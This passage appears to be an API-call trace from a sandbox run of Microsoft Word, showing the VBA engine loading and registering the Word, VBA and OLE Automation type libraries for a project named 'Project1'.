returned 0x0 [0041.233] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x186798, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x274b2c8 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x274b2c8*="\xdc3c\xe423\x7fe") returned 0x0 [0041.233] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186588 | out: ppvObject=0x186588*=0x0) returned 0x80004002 [0041.233] ITypeLib:RemoteGetLibAttr (in: This=0x6992850, ppTLibAttr=0x186580, pDummy=0x10 | out: ppTLibAttr=0x186580, pDummy=0x10) returned 0x0 [0041.233] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x0, pbstrName=0x186578, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x68a2e50 | out: pbstrName=0x186578*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x68a2e50*="琀栀 漀甀爀猀⸀") returned 0x0 [0041.233] StringFromGUID2 (in: rguid=0x68f12f0*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1865a0, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0041.233] _ultow_s (in: _Value=0x8, _Buffer=0x1864ea, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0041.233] _ultow_s (in: _Value=0x7, _Buffer=0x1864ee, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0041.233] _ultow_s (in: _Value=0x0, _Buffer=0x1864f2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.233] wcscpy_s (in: _Destination=0x6a97938, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.233] wcscpy_s (in: _Destination=0x6a9793e, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0041.233] wcscpy_s (in: _Destination=0x6a9798a, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0041.233] wcscpy_s (in: _Destination=0x6a97998, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0041.233] wcscpy_s (in: _Destination=0x6a97a0e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0041.233] ITypeLib:LocalReleaseTLibAttr (This=0x6992850) returned 0x0 [0041.233] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b9f670, cb=0x1a0) returned 0x6a0ff00 [0041.233] wcscpy_s (in: _Destination=0x6a0ff00, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0041.233] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x186698, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0041.233] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0041.233] strcpy_s (in: _Dst=0x186490, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0041.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186490, cbMultiByte=5, lpWideCharStr=0x1862e0, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0041.233] wcsncpy_s (in: _Destination=0x186290, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0041.233] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0041.233] IMalloc:Alloc (This=0x7feffc15380, cb=0x11c) returned 0x6b20b70 [0041.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x6b20b70, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0041.233] IMalloc:Free (This=0x7feffc15380, pv=0x6b20b70) [0041.233] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0041.233] wcsncpy_s (in: _Destination=0x186290, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.234] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x1861c0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.234] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.234] IUnknown:AddRef (This=0x6992850) returned 0x5 [0041.234] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1866b8 | out: ppvObject=0x1866b8*=0x0) returned 0x80004002 [0041.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x186680, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0041.234] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0041.234] IUnknown:Release (This=0x6992850) returned 0x4 [0041.234] IUnknown:AddRef (This=0x6990960) returned 0x3 [0041.234] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x186798, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.234] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186588 | out: ppvObject=0x186588*=0x0) returned 0x80004002 [0041.234] ITypeLib:RemoteGetLibAttr (in: This=0x6990960, ppTLibAttr=0x186580, pDummy=0x10 | out: ppTLibAttr=0x186580, pDummy=0x10) returned 0x0 [0041.234] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x0, pbstrName=0x186578, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8c1728b57198 | out: pbstrName=0x186578*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8c1728b57198) returned 0x0 [0041.234] StringFromGUID2 (in: rguid=0x68f12f0*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1865a0, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0041.234] _ultow_s (in: _Value=0x4, _Buffer=0x1864ea, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0041.234] _ultow_s (in: _Value=0x2, _Buffer=0x1864ee, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0041.234] _ultow_s (in: _Value=0x9, _Buffer=0x1864f2, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0041.234] wcscpy_s (in: _Destination=0x6a97938, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.234] wcscpy_s (in: _Destination=0x6a9793e, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0041.234] wcscpy_s (in: _Destination=0x6a9798a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0041.234] wcscpy_s (in: _Destination=0x6a97998, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0041.234] wcscpy_s (in: _Destination=0x6a97a1e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0041.234] ITypeLib:LocalReleaseTLibAttr (This=0x6990960) returned 0x0 [0041.234] IMalloc:Realloc (This=0x7feffc15380, pv=0x6a0ff00, cb=0x340) returned 0x6c80d20 [0041.234] wcscpy_s (in: _Destination=0x6c80e68, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0041.234] ITypeLib:RemoteGetDocumentation (in: This=0x6990960, index=-1, refPtrFlags=0x186698, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0041.235] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0041.235] strcpy_s (in: _Dst=0x186490, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0041.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186490, cbMultiByte=4, lpWideCharStr=0x1862e0, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0041.235] IUnknown:AddRef (This=0x6992850) returned 0x5 [0041.235] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x1863b0, pBstrLibName=0x1862e0 | out: pfName=0x1863b0*=0, pBstrLibName=0x1862e0) returned 0x0 [0041.235] IUnknown:Release (This=0x6992850) returned 0x4 [0041.235] IMalloc:Alloc (This=0x7feffc15380, cb=0xc) returned 0x6c32770 [0041.235] IMalloc:Free (This=0x7feffc15380, pv=0x68e9880) [0041.235] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9880 [0041.235] IMalloc:Free (This=0x7feffc15380, pv=0x6c32770) [0041.235] wcsncpy_s (in: _Destination=0x186290, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0041.235] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0041.235] IMalloc:Alloc (This=0x7feffc15380, cb=0x122) returned 0x6b20b70 [0041.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x6b20b70, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0041.235] IMalloc:Free (This=0x7feffc15380, pv=0x6b20b70) [0041.235] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0041.235] wcsncpy_s (in: _Destination=0x186290, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.235] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x1861c0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.235] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.235] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.235] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1866b8 | out: ppvObject=0x1866b8*=0x0) returned 0x80004002 [0041.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x186680, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0041.235] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0041.235] IUnknown:Release (This=0x6990960) returned 0x3 [0041.235] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14010 [0041.235] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c14010) returned 0x0 [0041.235] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14000 [0041.235] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c14000) returned 0x0 [0041.236] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c14020 [0041.236] qsort (in: _Base=0x6c14020, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee4385594 | out: _Base=0x6c14020) [0041.236] IMalloc:Free (This=0x7feffc15380, pv=0x6c14020) [0041.236] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x6c32770 [0041.236] IMalloc:Alloc (This=0x7feffc15380, cb=0xc) returned 0x6c324f0 [0041.236] IMalloc:GetSize (This=0x7feffc15380, pv=0x6c324f0) returned 0xc [0041.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0041.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0041.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0041.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0041.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0041.236] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0041.236] IMalloc:Free (This=0x7feffc15380, pv=0x6c14000) [0041.236] IMalloc:Free (This=0x7feffc15380, pv=0x6c14010) [0041.236] CoCreateGuid (in: pguid=0x186d68 | out: pguid=0x186d68*(Data1=0xc53497a9, Data2=0xdcd5, Data3=0x42e3, Data4=([0]=0x94, [1]=0xa5, [2]=0x0, [3]=0x6a, [4]=0xe, [5]=0xa, [6]=0x8b, [7]=0x46))) returned 0x0 [0041.236] wcsncmp (_String1="*\\Z", _String2="*\\Z", _MaxCount=0x3) returned 0 [0041.236] IMalloc:Alloc (This=0x7feffc15380, cb=0x6b0) returned 0x6ca8b10 [0041.236] CoCreateGuid (in: pguid=0x6a7e1c8 | out: pguid=0x6a7e1c8*(Data1=0xe981d4bf, Data2=0xb75b, Data3=0x42d8, Data4=([0]=0x9f, [1]=0xcc, [2]=0xc7, [3]=0xd1, [4]=0x1b, [5]=0xa8, [6]=0x3, [7]=0xa4))) returned 0x0 [0041.236] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x0) returned 0x6c14010 [0041.236] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e62fc0 [0041.236] strcpy_s (in: _Dst=0x6a7e228, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0041.236] LoadStringA (in: hInstance=0x7fef92d0000, uID=0x32f3, lpBuffer=0x274b558, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0041.237] wsprintfA (in: param_1=0x274b55f, param_2="%d" | out: param_1="1") returned 1 [0041.237] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f0158, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0041.237] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0041.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f0158, cbMultiByte=8, lpWideCharStr=0x68f12f8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0041.237] lstrlenA (lpString="Project") returned 7 [0041.237] lstrcmpiA (lpString1="Project", lpString2="Project1") returned -1 [0041.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x274b558, cbMultiByte=-1, lpWideCharStr=0x187a40, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0041.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x187930, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0041.237] lstrcmpiA (lpString1="", lpString2="Project1") returned -1 [0041.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0041.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x187830, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0041.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0041.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x187740, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0041.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0041.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x187740, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0041.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x187600, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0041.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0041.238] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0041.238] IMalloc:Alloc (This=0x7feffc15380, cb=0x18) returned 0x690ef00 [0041.238] IMalloc:Free (This=0x7feffc15380, pv=0x68e9880) [0041.238] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9880 [0041.238] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9880, cb=0x44) returned 0x6b850e0 [0041.238] IMalloc:Free (This=0x7feffc15380, pv=0x690ef00) [0041.238] wcsncpy_s (in: _Destination=0x187400, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.238] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x187330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.238] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.238] strcpy_s (in: _Dst=0x6a7e238, _DstSize=0x9, _Src="Project1" | out: _Dst="Project1") returned 0x0 [0041.238] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0041.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f0158, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0041.238] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0041.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f0158, cbMultiByte=9, lpWideCharStr=0x68f12f8, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0041.239] lstrlenA (lpString="Project1") returned 8 [0041.239] QueryPathOfRegTypeLib (in: guid=0x7fee45e9508*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x2, wMin=0x0, lcid=0x0, lpbstrPathName=0x1875a8 | out: lpbstrPathName=0x1875a8) returned 0x0 [0041.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb", cchWideChar=-1, lpMultiByteStr=0x187560, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlb", lpUsedDefaultChar=0x0) returned 32 [0041.241] lstrlenA (lpString="C:\\Windows\\system32\\stdole2.tlb") returned 31 [0041.241] lstrcpyA (in: lpString1=0x2747f10, lpString2="C:\\Windows\\system32\\stdole2.tlb" | out: lpString1="C:\\Windows\\system32\\stdole2.tlb") returned="C:\\Windows\\system32\\stdole2.tlb" [0041.241] _access_s (_FileName="C:\\Windows\\system32\\stdole2.tlb", _AccessMode=0) returned 0x0 [0041.241] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x187918*=0x0 | out: pptlib=0x187918*=0x6992df0) returned 0x0 [0041.242] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x1875a8*=0x0 | out: pptlib=0x1875a8*=0x6992df0) returned 0x0 [0041.242] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x1875c8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1874b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0041.242] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0041.242] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x187488 | out: ppvObject=0x187488*=0x0) returned 0x80004002 [0041.242] GetLocalTime (in: lpSystemTime=0x187330 | out: lpSystemTime=0x187330*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2e9)) [0041.242] wcsncpy_s (in: _Destination=0x186fe0, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.242] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x186f10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.242] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.242] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1873b8 | out: ppvObject=0x1873b8*=0x0) returned 0x80004002 [0041.242] ITypeLib:RemoteGetLibAttr (in: This=0x6992df0, ppTLibAttr=0x1873b0, pDummy=0x10 | out: ppTLibAttr=0x1873b0, pDummy=0x10) returned 0x0 [0041.242] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x0, pbstrName=0x1873a8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x1873a8*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 